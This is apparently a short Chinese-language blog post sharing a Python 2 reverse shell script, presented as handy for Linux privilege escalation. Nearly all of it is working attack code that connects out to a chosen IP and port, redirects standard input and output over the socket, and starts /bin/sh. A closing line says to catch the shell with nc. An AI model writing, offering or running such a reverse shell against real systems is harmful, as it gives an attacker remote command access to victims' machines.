Python反弹shell

admin

     反弹的shell其实就是bash shell，只不过用Python建立连接，然后通过socket的方式达到交互的目的，Linux溢出提权的时候比较有用。例子有很多，这里分享个简单小巧的。

1. 
   
2. #!/usr/bin/python
   
3. import sys,os,socket
   
4. print "----------------------------------------"
   
5. print "|         Python Reverse Shell         |"
   
6. print "----------------------------------------"
   
7. 
   
8. def usage():
   
9.         print "usage: ./shell.py <ip> <port>"
   
10.         print "example: ./ shell.py 192.168.1.11 1234"
    
11. 
    
12. def main():
    
13.         if len(sys.argv) != 3:
    
14.                 usage()
    
15.                 sys.exit()
    
16.         
    
17.         ip = sys.argv[1]
    
18.         port = int(sys.argv[2])
    
19.         
    
20.         s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    
21.         
    
22.         try:
    
23.                 s.connect((ip, port))
    
24.                 print "[*] Connected success."
    
25.         except:
    
26.                 print "[*] Connect failed(%s:%s)" % (ip, port)
    
27.                 sys.exit()
    
28.         
    
29.         s.send("----------------------------------------\n")
    
30.         s.send("|          Python Reverse Shell        |\n")
    
31.         s.send("----------------------------------------\n")
    
32. 
    
33.         os.dup2(s.fileno(), sys.stdin.fileno())
    
34.         os.dup2(s.fileno(), sys.stdout.fileno())
    
35.         os.dup2(s.fileno(), sys.stderr.fileno())
    
36.         os.system("/bin/sh")                  #或者/bin/bash
    
37.         s.close
    
38.         s.send("Bye!")
    
39. 
    
40. if __name__ == "__main__":
    
41.         main()

复制代码

反弹以后可用nc等工具连接获得交互式shell